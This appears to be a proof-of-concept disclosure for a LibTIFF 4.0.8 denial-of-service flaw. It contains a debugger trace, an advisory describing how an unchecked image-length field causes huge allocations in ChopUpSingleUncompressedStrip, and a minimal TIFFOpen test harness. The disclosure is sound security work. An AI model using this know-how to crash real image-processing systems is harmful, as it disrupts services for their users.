poc

crash-998b6dac084522aac42b8bfb30c6439e3bfccc98

debug.txt

----------------------------------------------------------------------------------------------------------------------------------------------[ source:tif_dirread.c+5701 ]----
   5697	         nstrips = TIFFhowmany_32(td->td_imagelength, rowsperstrip);
   5698	         if( nstrips == 0 )
   5699	             return;
   5700	 
		// tif=0x00007fffffffe028 -> [...] -> "crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", newcounts=0x00007fffffffe040 -> 0x0000000020f222ec
->5701	 	newcounts = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
   5702	 				"for chopped \"StripByteCounts\" array");
   5703	 	newoffsets = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
   5704	 				"for chopped \"StripOffsets\" array");
   5705	 	if (newcounts == NULL || newoffsets == NULL) {
----------------------------------------------------------------------------------------------------------------------------------------------------------------[ threads ]----
[#0] Id 1, Name: "TIFFOpen", stopped, reason: SINGLE STEP
------------------------------------------------------------------------------------------------------------------------------------------------------------------[ trace ]----
[#0] 0x418d42->Name: ChopUpSingleUncompressedStrip(tif=0x67b010)
[#1] 0x414d2f->Name: TIFFReadDirectory(tif=0x67b010)
[#2] 0x419f76->Name: TIFFClientOpen(name=0x44cf50 "crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", mode=0x44cf48 "r", clientdata=0x7fff00000003, readproc=0x4210b6 <_tiffReadProc>, writeproc=0x421184 <_tiffWriteProc>, seekproc=0x421252 <_tiffSeekProc>, closeproc=0x4212a9 <_tiffCloseProc>, sizeproc=0x4212c9 <_tiffSizeProc>, mapproc=0x421311 <_tiffMapProc>, unmapproc=0x4213a6 <_tiffUnmapProc>)
[#3] 0x421421->Name: TIFFFdOpen(fd=0x3, name=0x44cf50 "crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", mode=0x44cf48 "r")
[#4] 0x421528->Name: TIFFOpen(name=0x44cf50 "crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", mode=0x44cf48 "r")
[#5] 0x404afd->Name: main()
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5701		newcounts = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
gef> p nstrips
$2 = 0x11223344
gef> 

info.txt

Title: LibTiff TIFFOpen Denial of Service Vulnerability
Version: V4.0.8
Credit:  Yu Zhou of Ant-financial Light-Year Security Lab

Description
In LibTIFF 4.0.8, there is a denial of service vulnerability in the TIFFOpen function. A crafted input will lead to a denial of service attack. 

During the TIFFOpen process, the td_imagelength does not be checked. The value of td_imagelength can be directly controlled by input file. 
In ChopUpSingleUncompressedStrip function, here will call _TIFFCheckMalloc function based on td_imagelength. If we set the value of td_imagelength 
close to system memory, it will hung the system or trigger OOM killer.

The vulnerability can affect a lot of the software(e.g, ImageMagick) or system(e.g, Debian) used libtiff library, because it can be triggered in TIFFOpen function.

TIFFOpen.c

#include <stdio.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <errno.h>
#include "tiffio.h"

int main()
{
    TIFF *tif;
    tif = TIFFOpen("crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", "r");
    if (tif == NULL)
    {
        printf("TIFFOpen error!\n");
        return 0;
    }
    TIFFClose(tif);
    return 0;
}